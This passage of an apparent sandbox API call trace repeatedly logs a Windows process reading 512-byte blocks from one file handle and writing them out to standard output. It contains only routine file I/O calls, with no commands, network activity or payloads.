(hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.053] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.053] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, 
lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.054] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.054] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: 
hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.055] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.055] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.056] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.056] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, 
lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.057] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.057] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 
0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.058] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.058] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) 
returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.059] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.059] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) 